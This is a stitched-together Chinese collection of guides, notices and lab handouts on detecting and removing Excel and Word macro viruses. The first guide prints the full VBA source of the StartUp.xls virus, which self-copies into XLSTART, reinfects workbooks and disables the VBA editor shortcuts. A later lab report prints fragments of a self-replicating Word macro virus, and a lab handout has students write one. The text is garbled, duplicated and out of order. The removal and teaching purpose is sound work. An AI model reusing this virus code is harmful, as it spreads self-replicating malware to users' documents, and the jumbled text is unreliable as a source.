一个简单宏病毒的感染与清楚
清除宏病毒
清除宏病毒,名字是:StartUp.xls方法--大白菜文中图片都很小,看不清楚,可以用以下快捷方式:按住ctrl 向上滚动鼠标滑轮可以放大word,就可以看清楚图片了病毒样本如下:(下面是宏病毒代码,电脑知识欠缺的,千万被乱动哦,小心弄巧成拙)Vba代码=================宏病毒代码复制从下一行开始=================Sub auto_open()On Error Resume NextIf ThisWorkbook.Path <> Application.StartupPath AndDir(Application.StartupPath & "\" & "StartUp.xls") = "" ThenApplication.ScreenUpdating = FalseThisWorkbook.Sheets("StartUp").CopyActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")n$ = ActiveWindow.Visible = FalseWorkbooks("StartUp.xls").SaveWorkbooks(n$).Close (False)End IfApplication.OnSheetActivate = "StartUp.xls!cop"Application.OnKey "%{F11}", "StartUp.xls!escape"Application.OnKey "%{F8}", "StartUp.xls!escape"End SubSub cop()On Error Resume NextIf ActiveWorkbook.Sheets(1).Name <> "StartUp" ThenApplication.ScreenUpdating = Falsen$ = Workbooks("StartUp.xls").Sheets("StartUp").Copybefore:=Worksheets(1)Sheets(n$).SelectEnd IfEnd SubSub back()On Error Resume NextApplication.OnKey "%{F8}", "StartUp.xls!escape"Application.OnKey "%{F11}", "StartUp.xls!escape"Application.OnSheetActivate = "StartUp.xls!cop"Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop" Workbooks.Open Application.StartupPath & "\StartUp.xls"End SubSub escape()On Error Resume NextApplication.OnSheetActivate = "StartUp.xls!back"Application.OnKey "%{F11}"Application.OnKey "%{F8}"Application.SendKeys "%{F11}"Application.SendKeys "%{F8}"For Each book In WorkbooksApplication.DisplayAlerts = FalseIf book "StartUp.xls" Then book.Sheets("StartUp").DeleteNextFor Each book In WorkbooksIf = "StartUp.xls" Thenbook.CloseEnd IfNextEnd Sub=================宏病毒代码复制到上一行结束=================为了知道如何操作,亲自运行病毒源码之后,(按住ctrl 向上滚动鼠标滑轮可以放大word ,就可以看清楚图片了)采取以下的方法处理,可以清除病毒并使感染文件在修改保存后也清除病毒(网上有人说用360或卡巴直接杀会导致文件打不开):说明:如果找不到那个路径,是因为C盘是系统盘,那些是系统文件,被隐藏了,可以参照:/xiaolincc26/blog/item/2c524d4be7757c2d08f7ef35.h tml去做步骤:一、删除Excel11.xls文件位置路径:C:\Documents and Settings\Administrator\ApplicationData\Microsoft\Excel\Excel11.xls,该文件删除后,Excel会自动重建的;二、删除StartUp.xls文件位置路径:C:\Documents and Settings\Administrator\ApplicationData\Microsoft\Excel\XLSTART\StartUp.xls二、新建一个空的StartUp.xls,工具-》宏-》录制宏(随便录,只是为了能打开VBA编辑器);下面这个就叫VBA编辑器(普通人没有要知道,百度一下就有/view/88461.htm):这张图不是步骤中的内容,只是了解下.第二步:1.新建一个Excel:2.重命名为StartUp.xls三、从“工具->宏->宏”里面,选择刚才录制的宏,选择“编辑”,把全部内容都选中,把用下列内容替换:第三步:1.打开刚刚新建的那个Excel: StartUp.xls2.打开录制宏,工具-》宏—>录制宏,点击上图的确定,3.打开宏,工具—》宏--》宏,4.点击编辑按钮,5.复制Vba代码(看清楚开始和结束位置)内容到编辑区,覆盖原有的内容,Vba代码============复制从下一行开始(Sub auto open()开始)=============Sub auto_open()On Error Resume NextApplication.ScreenUpdating = FalseActiveWindow.Visible = Falsen$ = Workbooks(n$).Close (False)Application.OnSheetActivate = "StartUp.xls!cop"End SubSub cop()On Error Resume NextDim VBC As ObjectDim Name As String'Dim delComponent As VBComponentName = "StartUp"For Each book In WorkbooksSet delComponent = book.VBAProject.VBComponents(Name)book.VBAProject.VBComponents.Remove delComponentNextEnd Sub============复制到上一行结束(End Sub结束)=============6.关闭时候,保存StartUp.xls四、保存,然后再打开染毒文档,修改保存一下就可以清除掉感染的病毒。
怎么清除Word宏病毒
怎么清除Word宏病毒在这个病毒泛滥的时代里面,你是否听说过宏病毒?那你知道怎么清除Word宏病毒吗?下面是店铺整理的一些关于怎么清除Word宏病毒的相关资料,供你参考。
清除Word宏病毒的方法:一、Word宏病毒MicrosoftWord中对宏定义为:“宏就是能组织到一起作为一独立的命令使用的一系列Word命令,它能使日常工作变得更容易。
”Word使用宏语言WordBasic将宏作为一系列指令来编写。
要想搞清楚宏病毒的来龙去脉,必须了解Word宏的知识及WordBasic编程技术。
Word宏病毒是一些制作病毒的专业人员利用MICROSOFTWord 的开放性即Word中提供的WordBASIC编程接口,专门制作的一个或多个具有病毒特点的宏的集合,这种病毒宏的集合影响到计算机使用,并能通过DOC文档及DOT模板进行自我复制及传播。
宏病毒的特点1、传播极快Word宏病毒通过DOC文档及DOT模板进行自我复制及传播,而计算机文档是交流最广的文件类型。
多年来,人们大多重视保护自己计算机的引导部分和可执行文件不被病毒感染,而对外来的文档文件基本是直接浏览使用,这给Word宏病毒传播带来很多便利。
特别是Internet网络的普及,E-mail的大量应用更为Word宏病毒传播铺平道路。
2、制作、变种方便Word使用宏语言WordBasic来编写宏指令。
宏病毒同样用WordBasic来编写。
目前,世界上的宏病毒原型已有几十种,其变种与日骤增,追究其原因还是Word的开放性所致。
现在的Word病毒都是用WordBasic语言所写成,大部分Word病毒宏并没有使用Word提供的Execute—Only处理函数处理,它们仍处于可打开阅读修改状态。
所有用户在Word工具的宏菜单中很方便就可以看到这种宏病毒的全部面目。
当然会有“不法之徒”利用掌握的Basic语句把其中病毒激活条件和破坏条件加以改变,立即就生产出了一种新的宏病毒,甚至比原病毒的危害更加严重。
宏病毒
如果您并不希望在文档中包含宏,或者不了解文档的确切来源。例如,文档是作为电子邮件的附件收到的,或是来自网络或不安全的 Internet节点。在这种情况下,为了防止可能发生的病毒传染,打开文档过程中出现宏警告提示时最好选择“取消宏”。
2.制作、变种方便
以往病毒是以二进制的计算机机器码形式出现,而宏病毒则是以人们容易阅读的源代码宏语言WordBasic形式出现,所以编写和修改宏病毒比以往病毒更容易。世界上的宏病毒原型己有几十种,其变种与日俱增,追究其原因还是Word的开放性所致。现在的Word病毒都是用WordBasic语言所写成,大部分Word病毒宏并没有使用Word提供的Execute-Only处理函数处理,它们仍处于可打开阅读修改状态。所有用户在Word工具的宏菜单中很方便就可以看到这种宏病毒的全部面目。当然会有“不法之徒”利用掌握的Basic语句简单知识把其中病毒激活条件和破坏条件加以改变,立即就生产出了一种新的宏病毒,甚至比原病毒的危害更加严重。
起源
宏病毒起源 当病毒的先驱者们醉心于他们高超的汇编语言技术和成果时,可能不会想到后继者能以更加简单的手法制造影响力更大的病毒。Word宏病毒就是其中最具有代表性的范例之一。
其实宏病毒的出现并非出乎人们的意料,早在80年代后期就有专家预言过。那时,有些学生就用某些应用程序的宏语言编写病毒。然而,宏病毒与普通病毒不同,它不感染.EXE或.COM文件,而只感染文档文件。宏病毒就像自然界中令人恐惧的龙卷风,对人们正常使用计算机进行学习和工作带来了不可估量的影响,同时也造成了社会财富的巨大浪费。
鉴于绝大多数人都不需要或着不会使用“宏”这个功能,我们可以得出一个相当重要的结论:如果您的OFFICE文档在打开时,系统给出一个宏病毒警告框,那么您应该对这个文档保持高度警惕,它已被感染的几率极大。注意:简单地删除被宏病毒感染的文档并不能清除OFFICE系统中的宏病毒!
宏病毒处理方法
宏病毒处理方法----6f0bef1d-715c-11ec-9def-7cb59b590d7d 各位领导及同事:最近,在各个部门的办公软件中都发现了宏病毒。
宏病毒会自动改变EXECL文件的安全性(自动将其设置为低),并在攻击后销毁受感染的office文件,严重影响每个人的日常工作。
处理方式简要介绍如下(该处理方式主要针对office 2022):一:随本文件一起打包有“金山毒霸宏病毒专杀工具”,双击“金山毒霸宏病毒专杀工具”自动进行安装,安装后界面如下:点击全面杀毒,全面检查并杀灭电脑中的office病毒。
(如果电脑上安装了WPS,并且专门杀掉了金山毒霸宏病毒,则无法对其进行检查和杀掉)二:1、随本文件一起打包有最新360安装文件,双击“新版360杀毒软件”进行安装(注意:在安装360安装包前需将电脑以前安装过的杀毒软件卸载,卸载后重启电脑再安装最新版360),新版360在病毒免疫中启动新增office宏病毒免疫功能。
2.在杀毒软件右上角,打开设置,按下图设置杀毒软件参数:3、在设置中打开“病毒扫描设置”,其中“需要扫描文件类型”选中“扫描所有文件、进入压缩包查毒”。
4.设置完成后,更新杀毒软件,如下图所示。
点击软件右上角的“升级”按钮,在打开的界面中自动升级。
反复确认升级完成后,选择“完全扫描”,然后检查病毒。
三:查杀完宏病毒后打开excel表格文件设置,将宏的安全性设置为高“工具——宏——安全性”如果宏的安全性不能设置为高,则需要对该文件点击右键,单独进行一次360杀毒和“金山毒霸宏病毒专用杀毒工具”杀毒,然后将“宏”安全调整为“中”,如下图所示。
打开文件后,如果出现“禁用宏”或“启用宏”选项,请选择“启用宏”。
(您只需检查并终止文档一次)希望各部门严格按照上述方法对公司办公电脑及个人电脑进行office宏病毒查杀。
海螺其他兄弟公司也有宏病毒出现,请大家在接受邮件及使用移动存储设备之前先使用上述两个软件进行查杀后再打开,以免出现重复感染。
清除excel宏病毒如何清除excel电子表格宏病毒
清除excel宏病毒如何清除excel电⼦表格宏病毒
Excel中的宏病毒相信很多朋友都有遇到过吧,那么如何清除呢?下⾯是⼩编最近学到的⼀个有效清除Excel电⼦表格宏病毒的⽅法,特意在此跟⼤家进⾏分享!
⼿动清除Excel宏病毒的具体⽅法:
1、进⼊ C:Program FilesMicrosoft OfficeOFFICE11xlstart下先删除book1⽂件,(注意:这个C是指你的系统盘,⽐如我的是双系统,那么打开C盘就是删了也是⽆⽤的,看你使⽤的是哪个系统。
)然后再建⽴Book1⽂件夹;
2、打开EXCEL⽂档,格式——>⼯作表——>取消隐藏⼯作表,删除xl4poppy⼯作表,然后,点击菜单:插⼊——>名称——>定义,删除所有的名称。
保存;
3、处理完再删除刚才建⽴的⽂件夹。
这样就可以清松消灭掉Excel宏病毒,再打开你的excel⽂件,就安全了。
word宏病毒查杀技巧
word宏病毒查杀技巧
word宏病毒查杀技巧
宏病毒是通过Word中的宏语言(一种类似VB的语言)编写的,易于传播而且危害巨大,常常能将用户花了很多时间编写的文档瞬间“吃掉”,下面介绍使用手工的方法杀掉和预防宏病毒。
单击“工具”菜单栏,选择“宏”,单击“宏”命令,或者使用组合键Alt+F8调出宏对话框,如果在弹出的对话框中有已经记录的宏的话,那就极有可能是宏病毒,删除所有的宏就可以了;比较复杂的宏病毒会将宏对话框屏蔽掉,这时就需要采用其他方法。
Word环境中的宏病毒一般是存放在Microsoft Office目录下Templates子目录中的Normal.dot文件中,这时需要重新启动计算机,找到这个文件,并把它删除,再运行Word就可以了。
有些宏病毒“知道”用户会找到Normal.dot并删除掉,所以它会在硬盘的多个目录中放上同样的Normal.dot,如果只删除Templates下的一个,Word会按照Windows缺省的搜索路径进行搜索,这样会加载其他有毒的Normal.dot,并把删除掉的再重新恢复。
这时,用户只要使用Windows中的查找文件的方法把硬盘中所有的Normal.dot全部删除就可以了。
将宏病毒从根拔起预防宏病毒的方法其实很简单,因为宏病毒在Word中寄居的文件就是Normal.dot,所以只要把没有感染宏病毒的Normal.dot文件的属性设置为只读,这样宏病毒就不能寄居到Normal.dot中,这样能起到预防宏病毒的效果了。
1。
宏病毒的查杀方法
一、宏病毒是什么?宏病毒是一种寄存在文档或模板的宏中的计算机病毒。
一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。
从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。
二、宏病毒的判断方法虽然不是所有包含宏的文档都包含了宏病毒,但当有下列情况之一时,您可以百分之百地断定您的OFFICE文档或OFFICE系统中有宏病毒:1、在打开“宏病毒防护功能”的情况下,当您打开一个您自己写的文档时,系统会会弹出相应的警告框。
而您清楚您并没有在其中使用宏或并不知道宏到底怎么用,那么您可以完全肯定您的文档已经感染了宏病毒。
2、同样是在打开“宏病毒防护功能”的情况下,您的OFFICE文档中一系列的文件都在打开时给出宏警告。
由于在一般情况下我们很少使用到宏,所以当您看到成串的文档有宏警告时,可以肯定这些文档中有宏病毒。
3、如果软件中关于宏病毒防护选项启用后,不能在下次开机时依然保存。
WORD中提供了对宏病毒的防护功能,它可以在“工具/选项/常规”中进行设定。
但有些宏病毒为了对付OFFICE中提供的宏警告功能,它在感染系统(这通常只有在您关闭了宏病毒防护选项或者出现宏警告后您不留神选取了“启用宏”才有可能)后,会在您每次退出OFFICE时自动屏蔽掉宏病毒防护选项。
因此您一旦发现:您的机器中设置的宏病毒防护功能选项无法在两次启动WORD之间保持有效,则您的系统一定已经感染了宏病毒。
也就是说一系列WORD模板、特别是normal.dot 已经被感染。
鉴于绝大多数人都不需要或着不会使用“宏”这个功能,我们可以得出一个相当重要的结论:如果您的OFFICE文档在打开时,系统给出一个宏病毒警告框,那么您应该对这个文档保持高度警惕,它已被感染的几率极大。
注意:简单地删除被宏病毒感染的文档并不能清除OFFICE系统中的宏病毒!三、宏病毒的防治和清除首选方法:用最新版的反病毒软件清除宏病毒。
excel怎么清除宏病毒
excel怎么清除宏病毒
Excel中臭名昭著的宏病毒相信很多朋友都有遇到过吧,这可是很烦人的一个病毒,那么如何清除它呢?下面小编来告诉你吧。
excel清除宏病毒的方法:
1、进入 C:\Program Files\Microsoft Office\OFFICE11\xlstart\下先删除book1文件,然后再建立Book1文件;
2、打开染了病毒的EXCEL文档,格式-->工作表-->取消隐藏工作表,删除xl4poppy工作表,然后,点击菜单:插入-->名称-->定义,删除所有的名称,保存文档;
3、处理完再删除刚才建立的Book1文件。
4、以上步骤就能清除所感染的某个文件的病毒,当然其他受感染某个文件也是一样的清除方法。
这样手动清除是会慢些,比如有些电脑里差不多所有Excel文件都染宏病毒,如果这样一个一个处理是不理智的。
对于这么多的病毒文件就应先用宏专杀软件来清除大部分病毒,剩下少数的变种宏病毒用以上这种方法就能根除了。
宏病毒的查杀与防治
3
宏病毒的概念
什么是“宏”
宏就是一组计算机指令--可以将它们录制下
来,并将它们与快捷键组合或宏名称关联起来。
然后,在按下快捷键组合或单击宏名称时,计算
机程序就会执行宏的指令。
4
宏病毒的概念
“宏”在哪里?
我们工作当中,离不开各种文档、表格。比如 微软公司出品的办公软件office2003。当中有 word文档、有excel文档等等。这些高度智能化的 办公软件当中,有很多可以把复杂的反复操作简单 化的指令合集。这种合集可以是自己录制的,也可 以是网络下载的。这就是“宏”
14
宏病毒的查杀及预防
1、提高对宏病毒的警惕性 在office办公软件当中,在 工具—宏—安全性 选项当中把宏安全性设置为 高。 2、时刻保持杀毒软件的正常运行 把杀毒软件的更新设置为自动更新,打开杀毒软 件所有的杀毒选项 3、不要随意打开不明电子邮件 宏病毒寄存在文档当中,通过邮件及U盘拷贝等形 式传播。在收到不明来历的电子邮件,马上删除。例 如:邮件标题为人才调查、人才招聘、财务报表、公 司计划等不明来历具有诱惑性的邮件
5
宏病毒的概念
宏病毒的起源
宏病毒在上个世纪90年代得益于网络及电子邮件 的发展而广泛传播。宏病毒主要感染文件有 word、 Excel 的文档。并且会驻留在系统内存上。因为这种 病毒活动特征区别于电脑病毒,所以一般的杀毒软件 不会报警。只有在用户打开及保存以上两种文档时感 染文件。
6
宏病毒的识别
在杀毒过程中不要选择自动处理,因为这很可能 会把你的染毒文件直接删除。
查找出来的染毒文件如果是重要文档,先用系统
自带的写字板工具打开,保存内容后再清除病毒。 确保重要文档不丢失。
预防和清除宏病毒的方法
预防和清除宏病毒的方法摘要:宏是WORD中避免一再的重复相同的动作而设计出来的一种工具,宏病毒就是利用软件所支持的宏命令编写的具有复制和传染能力的宏。
本文首先分析宏病毒的特性,并就如何检测、清除及预防进行了探讨。
关键词:宏病毒;WORD;预防;清除Abstract: The macro is a tool designed to avoid repeated the same action in the WORD, and a macro virus is the copy and infectious macro using the software to support macros written. This paper first analyzes the characteristics of macro virus, and discusses on how to detect, removal and prevent it.Key words: macro virus; WORD; prevention; clear所谓宏病毒,就是利用软件所支持的宏命令编写的具有复制和传染能力的宏。
宏病毒是一种新形态的计算机病毒,也是一种跨平台式计算机病毒。
1.宏病毒的工作原理在用W O R D 处理文档时,需要同时进行各种不同的动作,每一种动作其实都对应着特定的宏命令。
宏病毒的感染过程和破坏行为与WORD 的文件宏程序的操作密切相关,这些宏程序可能就是宏病毒的插入点。
病毒包含在宏中时,只要染毒的文件被打开,病毒的宏程序就可能会被执行,进而取得系统控制权,进行感染和破坏。
为了能广泛地传播,宏病毒大都采用感染通用模版NORMAL.DOT 的方法将自己复制到其他文档中去。
W O R D启动时总是自动打开通用模版,这就为宏病毒在每次启动WORD 时能够取得系统控制权提供了机会。
含有自动宏的染毒文档,当被其他计算机的WORD 打开时,也会自动感染该计算机。
计算机宏病毒分析及清除试验报告
If ThisDocument = NormalTemplate Then
Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule
End If
With host
If .Lines(1, 1) <> "'Micro-Virus" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, ourcodemodule.Lines(1, 100)
.ReplaceLine 2, "Sub Document_Close()"
Sub Document_Open()
On Error Resume Next
Application.DisplayStatusBar = False
Options.SaveNormalPrompt = False
Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule
实验报告
实验时间
2016年11月23日
实验地点
软件工程实验室
实验名称
计算机宏病毒分析及清除
实验目的:1、了解“宏病毒”机理;
2、掌握清除宏病毒的方法;
3、掌握采用“宏”和脚本语言进行编程的技术。
实验平台:1、Windows 2000/2003/XP或更高级别的Windows操作系统;
2、Office Word 2000/2003等字处理软件。
如何杀excel宏病毒的方法
如何杀excel宏病毒的方法在Excel中宏是经常用到的一个功能,不过也有中毒的危险,一旦中毒,可能有朋友就不知道该怎么办了。
接下来是店铺为大家带来的如何杀excel宏病毒的方法,希望对你有用。
如何杀excel宏病毒的方法:查杀宏病毒步骤1:首先打开你的excel,随便打开一个文件就可以了。
我们主要是设置一下安全性。
在菜单栏上找到工具,在工具菜单中,我们点击“宏”,在宏的次级菜单中,我们找到安全性,打开安全性对话框。
查杀宏病毒步骤2:在安全性对话框中,我们勾选非常高:只允许预定安装在受信任位置的宏。
然后点击确定,这样宏病毒就安全一些了。
查杀宏病毒步骤3:在开始菜单打开计算机,方法是点击开始——计算机。
查杀宏病毒步骤4:我们在计算机的地址栏中输入如下地址:C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART 按回车键就能够跳转到xlstart的文件夹查杀宏病毒步骤5:找到这个StartUp.xls文件,右键单击,选择删除。
,查杀宏病毒步骤6:接着我们重复4步骤,复制这个地址到地址栏:C:\Documents and Settings\administrator\Application Data\Microsoft\Excel 然后找到按回车键查杀宏病毒步骤7:找到excel11.xlb这个文件,右键单击,在右键菜单中选择删除。
查杀宏病毒步骤8:回到excel界面,在菜单栏上找到工具菜单,打开工具菜单,选择宏,在宏菜单中,选择visual basic编辑器。
查杀宏病毒步骤9:在下面这个图中,箭头指出来的位置有一个srartup,我们右键单击它,选择删除即可。
宏病毒清楚方法
公司电脑(Excel )中病毒(宏病毒)清楚方法
先执行一下excel.bat 的文件,然后执行以下操作,即可以解决电脑excel 中宏病毒情况。
1,电脑中病毒状态,如下图,有其中一个提示表示中病毒,
图1 点禁用宏
图2
如发现电脑中此病毒,请点取消,先不要打开有病毒的文档,以免所有文件都中病毒。
2,在桌面打开Excel,选择工具(tools)---->宏(Macro)------->V isual basic 编辑器(Visual Basic Editor),
3选择(1006(潘).xls) 的项目,找到Startup,选择移除(Remove StartUp).
4,系统提示是否导出此宏,选择否,不保存次宏,并关闭V isual Basic 编辑器。
5, 关闭Excel, 系统提示是否保存设置,选择是,即可手动清除此宏病毒。
如下图。
2011年11月11日。
「EXCEL宏病毒处理方法」
Excel宏病毒(BOOK1病毒)处理方法症状:第一次打开带病毒的EXCEL文档时,会提示“是否启用宏”对话框,以后每次打开EXCEL 文档时就会自动弹出一个Book1文档。
传播途径:主要以发送邮件或使用U盘时,接收了带病毒的EXCEL文档。
处理步骤:1、首先进行病毒查杀:使用360杀毒软件或瑞星杀毒软件查杀;2然后将病毒源进删除:在C:\Program Files\Microsoft Office\OFFICE11\xlstart\下,然后将book1文件删除。
查毒方式:主要有360杀毒软件和瑞星杀毒软件两种,这里详细介绍瑞星杀毒软件的安装和使用方法。
StartUp.xls宏病毒清除方法及步骤StartUp.xls宏病毒的现象:ﻫ1.打开excel文件时提示有宏2.文件不能直接保存,只能另存3.打开excel文件时,点击"窗口"->"取消隐藏",会打开一个Startup.xls文件ﻫStartUp.xls宏病毒清除方法及步骤:(excel宏病毒)第一步:清除C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART下的StartUp.xls;(注意:其中有些事隐藏文件,你看不到,按照下面说的做就可以看到那些隐藏文件:打开我的电脑》》工具》》文件夹选项》》“隐藏受保护的操作系统文件(推荐)”前面的勾打掉》》选中“显示隐藏的文件、文件夹和驱动器”》》去掉“隐藏已知文件类型的扩展名”的勾。
)第二步:清除C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\的Excel11.exe(约236K)及Excel11.xlb等名字中带有Excel11的文件。
(删除后Excel程序会自动创建部分文件)第三步:下载startup.xls并放入“C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART\”。
宏病毒清除操作手册
宏病毒清除操作手册摘要:宏病毒是一种常见的计算机病毒,它利用办公软件中的宏功能进行传播和感染。
本文档旨在为用户提供一份清除宏病毒的操作手册,包含如何识别宏病毒、清除感染文件以及预防宏病毒传播的方法等。
通过遵循本手册中的操作指引,用户可以及时有效地清除宏病毒,提高计算机系统的安全性和稳定性。
1. 简介宏病毒是一种利用办公软件(如Microsoft Office)中的宏功能进行传播和感染的计算机病毒。
它通常存在于Office文档(如Word 文档、Excel文件等)中,并且可以通过下载、打开或共享这些文件来传播。
一旦感染,宏病毒可能对计算机系统和文件造成损害,甚至可能导致数据丢失和系统崩溃。
2. 识别宏病毒在清除宏病毒之前,首先需要能够准确识别它们。
以下是一些常见的识别方法:a. 注意文件扩展名:宏病毒通常会将文件扩展名更改为“.docm”、“.xlsm”等,以启用宏功能。
b. 观察异常行为:如果文档在打开后自动执行某些操作或显示不寻常的行为,很可能是宏病毒的迹象。
c. 启用安全模式:通过将办公软件启动到安全模式,可以禁用宏并防止其执行。
3. 清除宏病毒一旦确定文件被宏病毒感染,请按照以下步骤清除它:a. 先暂时关闭宏:打开Office软件,前往“选项”>“信任中心”>“信任中心设置”,在“宏设置”中选择“禁用所有宏”选项。
b. 打开感染文件:用Office软件打开感染文件,进入“开发人员”选项卡,点击“宏”按钮。
c. 删除宏代码:在弹出的“宏”窗口中,选中所有宏代码,点击“删除”按钮,然后关闭文件并不保存修改。
d. 执行杀毒扫描:使用可靠的杀毒软件对计算机进行全面扫描以确保宏病毒已清除。
4. 防止宏病毒传播除了及时清除感染文件外,预防宏病毒的传播也是非常重要的。
下面是一些建议:a. 更新办公软件:始终确保您使用的办公软件是最新版本,并及时安装官方提供的安全补丁和更新。
b. 禁用宏功能:如果您在日常工作中不需要使用宏功能,可以将其禁用,从根本上减少宏病毒的风险。
关于宏病毒的判断、清除和预防
关于宏病毒的判断、清除和预防关于宏病毒的判断、清除和预防2011年01月15日星期六下午01:09关于宏病毒的判断和预防前两天从EXCEL论坛里下载了一个帖子的附件(当然我认为该帖的发表人也不知道文件里有病毒),没想里面有宏病毒"StartUp.xls"在打开文件时提示,缺少"StartUp.xls"。
因为论坛里有很多附件是包含宏的,为了使用时方便,因此我EXCEL中关于宏安全性设置的是"低"。
没想到造成了大错,在此提醒各位一定要将EXCEL中"工具→宏→安全性→安全级"设置为中,打开文件时要确认该文件是否包含宏。
对于宏病毒的判断:当安全级选为中时,如果一旦发现自己的不包含宏的文件打开时提示该文件包含宏,那么恭喜你已经中招了。
此时一定要注意所有打开的文件(指WORD、EXCEL文件)不要存盘,因为宏病毒只有存盘后才会被感染,如果需要将文件进行保存,建议存储为TXT格式,然后从新进行排版。
一定要将打开的文件作好备份再进行杀毒。
我从昨日中午发现机器里被感染病毒,先后使用了"esetsmartsecurity""瑞星天空网站版""360杀毒软件最新版",但前两个软件均没有查出该病毒。
只有360查了出来并将病毒清除。
注意:在杀毒时不要选择"自动处理扫描出的病毒威胁"因为杀毒软件有可能会直接将文件删除,到时重要文件被删掉可是哭都来不及了,当其查出中毒文件后如是重要文件一定要将其重新存储为TXT格式,也可以使用XP自带的"写字板"(注意不是记事本)将word文件直接打开,并将内容保存下来,然后再交给杀毒软件处理。
这样就能保证文件内容不会丢失了。
excel宏病毒是怎么来的随着Internet在中国的迅速拓展,特别是中国教育和科研计算机网(CERNET)以及商业性的ChinaNet和COMNet的发展,电子邮件同样成为许多网络用户使用的工具,互联的校园网络在促进学校科研教育发展的同时,也非常容易成为网络攻击的对象,特别是在网络建设的初期,网络安全意识和网络防范能力都较为薄弱.据透露,一种新的致命病毒---Hare病毒定于近期"发作".Hare病毒届时将显示HDEuthanasia的信息,然后企图重写计算机硬盘上的全部文件.英国《病毒公报》编辑IanWhalley指出,Hare极为复杂,而且很难查出.它是借Internet传播的,未激活版本已在几个国家发现,其中包括美国.另外一种新病毒属于被称为"宏病毒"的传染病毒家族,宏病毒于一年前首次被发现.这种新病毒称为roux,是首例感染Microsoft公司Excell 电子表格的病毒.Laroux的表现很像目前常见的Word.concept病毒,后者在MicrosoftWord生成的文档中传播.Laroux可做为电子表格的附件进入电子邮件,或以其他同电子表格相同的传送方式传播.据美国全国计算机安全协会(NCSA)称,这种病毒相对来说没有什么危害,但可导致少数系统的"应用软件异常".NCSA指出,Laroux看上去比Word.concept传播的速度要慢,因为Excel不像Word使用那么广泛,而且用户不常共用电子表格,而文字处理器文档则经常共用.去年,用户经受的宏病毒猛增了5倍,安全专家把这主要归结为一个因素--电子邮件的迅速增加。
清除APMP宏病毒最简单的方法
清除APMP宏病毒最简单的方法
1、打开word,如果弹出以下窗口一次或者两次,说明word模版已经感染了这种病毒,需要清理,请往下继续看。
2、按住快捷键Alt + F11 打开宏设计窗口,如下图:
3、选中工程视图下面的Normal –>Microsoft Word对象–> ThisDocument,并双击打开,如下图(注意是Normal下面的对象):
4、上图中我们可以看到病毒代码了,对病毒代码做如下修改(注意下图中红线标出的位置):
将12行中的<> 符号改为= ;
在14行最前面加上半角单引号即‘;
在19行最前面加上半角单引号即‘;
5、保存,关闭。
word模版中的病毒已被清除,并且如果文件中有病毒也会被清除。
实验病毒分析及清除实验
了解“宏病毒”机理 掌握清除宏病毒的方法。 掌握采用“宏”和脚本语言进行编程的技术。
2023/5/23
【实验内容】
(1)用宏或脚本语言编写一个实验性“宏病 毒”程序。
(2)对实验性文档进行感染实验。 (3)编写一个清除防御程序。对实验性文档中
的病毒进行清除。
2023/5/23
【实验开设方式】
(2)宏病毒
宏病毒(Macro Virus)是一种利用应用程序宏语言编 制的计算机病毒,它附着在某个文件上,当用户打 开这个文件时,宏病毒就被激活,并产生连锁性的 感染。
2023/5/23
【相关知识点】(续)
“概念”(Concept)病毒 “核子”(Nuclear)病毒 “彩色”(Colors)病毒 “无政府者一号”(MDMA.A)病毒 “格式化”病毒
2023/5/23
3、宏病毒的结构
4、宏病毒本身的局限性
2023/5/23
【相关知识点】(续)
5、宏病毒的清除 (1)用杀毒软件清除。 (2)用手工清除。
6、宏病毒的防御
(1) 设置宏的安全级别 (2) 为宏添加数字签名。
2023/5/23
【评分要求】100分
有原程序且运行正常(不死机)20分 有”病毒”程序且运行正常20分 有清除”病毒”程序能完成清除功能,20分 界面设计良好20分 有设计文档10分 有新增功能10分
个人或分组
2023/5/23
【实验设备与环境】
个人计算机 Windows 2000系统平台 Windows 2000 office应用程序 VB 开发环境
2023/5/23
【实验方法步骤】
编写一个简单的可执行程序(如:aaa.exe), 运行后显示“已感染宏病毒”。
宏病毒分析及清除实验
宏病毒分析及清除实验实验目的演示宏的编写说明宏的原理及其安全漏洞和缺陷理解宏病毒的作用机制。
实验环境Windows系列操作系统;Word 2003应用程序。
实验学时2学时,必做实验。
实验内容1.设置实验环境;2.打开带宏病毒的Word文档;3.查看感染过程,分析病毒;4.杀毒。
实验步骤:1.软件设置:关闭杀毒软件;打开Word 2003,在工具-宏-安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任visual basic项目的访问。
注意:为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。
2.运行宏病毒打开和创建若干.DOC文档,没有任何不正常的地方。
打开带有宏病毒的文件:“宏病毒.DOC”,存盘关闭。
查看感染过程3.自我复制功能演示。
新建或打开若干文档,查看自我复制和传染过程。
4.查看宏病毒打开一个“宏病毒.DOC”文档,然后按Alt+F11调用宏编写窗口(工具-宏-Visual Basic 宏编辑器),在左侧的project-Microsoft Word对象-ThisDocument中查看到VB代码,保存,表明当前word文档含有宏病毒,并将自身复制到Normal.dot(word文档的公共模板中也可以看到相同的代码)。
此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。
高明的病毒编写者其自我保护将做得非常好,可以使word的一些工具栏失效,例如将工具菜单中的宏选项屏蔽,也可以修改注册表达到很好的隐藏效果。
本例中只是屏蔽状态栏,以免显示宏的运行状态,并且修改公用模板时自动保存,不给用户提示。
5.清除宏病毒对每一个受感染的word文档进行如下操作:打开受感染的word文档,进入宏编辑环境(Alt+F11),打开Normal-Microsoft Word 对象-This Document,清除其中的病毒代码(只要删除所有内容即可)。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
